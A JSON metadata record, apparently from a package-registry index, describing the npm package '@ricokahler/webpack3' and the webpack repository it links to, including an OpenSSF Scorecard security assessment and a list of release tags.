[{"id":1151287,"name":"@ricokahler/webpack3","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"ricokahler","versions_count":1,"first_release_published_at":"2021-08-23T16:42:10.178Z","latest_release_published_at":"2021-08-23T16:42:10.178Z","latest_release_number":"3.12.0","last_synced_at":"2026-09-03T01:19:46.739Z","created_at":"2022-04-08T12:13:33.555Z","updated_at":"2026-09-03T01:19:46.740Z","registry_url":"https://www.npmjs.com/package/@ricokahler/webpack3","install_command":"npm install @ricokahler/webpack3","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"3.12.0"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2F